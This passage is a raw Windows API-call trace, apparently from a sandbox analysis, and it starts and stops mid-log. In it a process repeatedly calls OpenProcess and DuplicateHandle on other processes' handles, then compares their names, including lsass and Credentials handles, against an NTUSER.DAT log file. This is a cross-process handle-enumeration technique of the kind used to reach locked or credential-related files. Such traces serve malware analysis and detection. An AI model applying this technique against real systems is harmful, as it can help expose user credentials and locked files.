out: lpExitCode=0x32ee30) returned 1 [0162.350] CloseHandle (hObject=0x1e4) returned 1 [0162.350] CloseHandle (hObject=0x194) returned 1 [0162.350] CloseHandle (hObject=0x1e8) returned 1 [0162.350] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.350] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.351] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.353] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.353] CloseHandle (hObject=0x1e4) returned 1 [0162.353] _wcsicmp (_Str1="\\CatalogChangeListener-1d8-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0162.353] CloseHandle (hObject=0x194) returned 1 [0162.354] CloseHandle (hObject=0x1e8) returned 1 [0162.354] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.354] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.354] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.355] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.355] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.355] CloseHandle (hObject=0x1e4) returned 1 [0162.355] CloseHandle (hObject=0x194) returned 1 [0162.356] CloseHandle (hObject=0x1e8) returned 1 [0162.356] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.356] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.356] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.357] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.357] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.358] CloseHandle (hObject=0x1e4) returned 1 [0162.358] CloseHandle (hObject=0x194) returned 1 [0162.358] CloseHandle (hObject=0x1e8) returned 1 [0162.358] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.358] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.358] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.359] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.359] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.360] CloseHandle (hObject=0x1e4) returned 1 [0162.360] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.360] CloseHandle (hObject=0x194) returned 1 [0162.360] CloseHandle (hObject=0x1e8) returned 1 [0162.360] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.360] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.360] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.361] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.361] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.361] CloseHandle (hObject=0x1e4) returned 1 [0162.361] CloseHandle (hObject=0x194) returned 1 [0162.362] CloseHandle (hObject=0x1e8) returned 1 [0162.362] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.362] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.362] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.363] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.363] CloseHandle (hObject=0x1e4) returned 1 [0162.363] CloseHandle (hObject=0x194) returned 1 [0162.363] CloseHandle (hObject=0x1e8) returned 1 [0162.363] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.363] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.363] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.364] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.365] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.365] CloseHandle (hObject=0x1e4) returned 1 [0162.365] _wcsicmp (_Str1="\\PASSWD.LOG", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0162.365] CloseHandle (hObject=0x194) returned 1 [0162.365] CloseHandle (hObject=0x1e8) returned 1 [0162.365] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.365] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x354, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.366] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.367] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.367] CloseHandle (hObject=0x1e4) returned 1 [0162.367] CloseHandle (hObject=0x194) returned 1 [0162.367] CloseHandle (hObject=0x1e8) returned 1 [0162.367] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.367] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x358, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.367] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.368] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.369] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.369] CloseHandle (hObject=0x1e4) returned 1 [0162.369] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.369] CloseHandle (hObject=0x194) returned 1 [0162.369] CloseHandle (hObject=0x1e8) returned 1 [0162.369] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.369] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x360, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.369] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.370] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.371] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.371] CloseHandle (hObject=0x1e4) returned 1 [0162.371] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.371] CloseHandle (hObject=0x194) returned 1 [0162.371] CloseHandle (hObject=0x1e8) returned 1 [0162.371] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.371] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.371] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.372] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.373] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.373] CloseHandle (hObject=0x1e4) returned 1 [0162.373] CloseHandle (hObject=0x194) returned 1 [0162.373] CloseHandle (hObject=0x1e8) returned 1 [0162.373] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.373] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.373] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.374] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.375] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.375] CloseHandle (hObject=0x1e4) returned 1 [0162.375] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0162.375] CloseHandle (hObject=0x194) returned 1 [0162.375] CloseHandle (hObject=0x1e8) returned 1 [0162.375] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.375] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.375] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.376] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.377] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.377] CloseHandle (hObject=0x1e4) returned 1 [0162.377] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0162.377] CloseHandle (hObject=0x194) returned 1 [0162.377] CloseHandle (hObject=0x1e8) returned 1 [0162.377] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.378] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.378] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.378] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.379] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.379] CloseHandle (hObject=0x1e4) returned 1 [0162.379] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0162.379] CloseHandle (hObject=0x194) returned 1 [0162.379] CloseHandle (hObject=0x1e8) returned 1 [0162.379] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.379] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x550, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.379] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.380] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.381] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.381] CloseHandle (hObject=0x1e4) returned 1 [0162.381] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.381] CloseHandle (hObject=0x194) returned 1 [0162.381] CloseHandle (hObject=0x1e8) returned 1 [0162.381] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.381] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.381] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.382] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.382] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.383] CloseHandle (hObject=0x1e4) returned 1 [0162.383] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.383] CloseHandle (hObject=0x194) returned 1 [0162.383] CloseHandle (hObject=0x1e8) returned 1 [0162.383] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.383] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.383] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.384] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.384] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.384] CloseHandle (hObject=0x1e4) returned 1 [0162.384] CloseHandle (hObject=0x194) returned 1 [0162.384] CloseHandle (hObject=0x1e8) returned 1 [0162.385] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.385] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.385] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.385] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.386] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.386] CloseHandle (hObject=0x1e4) returned 1 [0162.386] CloseHandle (hObject=0x194) returned 1 [0162.386] CloseHandle (hObject=0x1e8) returned 1 [0162.386] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.386] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.386] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.387] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.388] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.388] CloseHandle (hObject=0x1e4) returned 1 [0162.388] _wcsicmp (_Str1="\\Credentials", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0162.388] CloseHandle (hObject=0x194) returned 1 [0162.388] CloseHandle (hObject=0x1e8) returned 1 [0162.388] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.388] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x608, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.388] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.390] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.393] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.393] CloseHandle (hObject=0x1e4) returned 1 [0162.393] _wcsicmp (_Str1="\\Credentials", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0162.393] CloseHandle (hObject=0x194) returned 1 [0162.394] CloseHandle (hObject=0x1e8) returned 1 [0162.394] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.394] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x738, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.394] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.394] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.395] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.395] CloseHandle (hObject=0x1e4) returned 1 [0162.395] _wcsicmp (_Str1="\\CatalogChangeListener-1e0-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0162.395] CloseHandle (hObject=0x194) returned 1 [0162.395] CloseHandle (hObject=0x1e8) returned 1 [0162.395] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.395] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x740, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.395] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.396] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.397] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.397] CloseHandle (hObject=0x1e4) returned 1 [0162.397] CloseHandle (hObject=0x194) returned 1 [0162.397] CloseHandle (hObject=0x1e8) returned 1 [0162.397] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.397] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x744, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.397] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.398] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.399] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.399] CloseHandle (hObject=0x1e4) returned 1 [0162.399] CloseHandle (hObject=0x194) returned 1 [0162.399] CloseHandle (hObject=0x1e8) returned 1 [0162.399] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.399] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x74c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.399] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.400] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.401] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.401] CloseHandle (hObject=0x1e4) returned 1 [0162.401] CloseHandle (hObject=0x194) returned 1 [0162.401] CloseHandle (hObject=0x1e8) returned 1 [0162.401] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.401] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.401] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.402] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.403] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.403] CloseHandle (hObject=0x1e4) returned 1 [0162.403] CloseHandle (hObject=0x194) returned 1 [0162.403] CloseHandle (hObject=0x1e8) returned 1 [0162.403] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0162.403] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x838, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.403] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.404] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.405] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.405] CloseHandle (hObject=0x1e4) returned 1 [0162.405] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.405] CloseHandle (hObject=0x194) returned 1 [0162.405] CloseHandle (hObject=0x1e8) returned 1 [0162.405] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0162.405] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.405] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.406] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.407] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 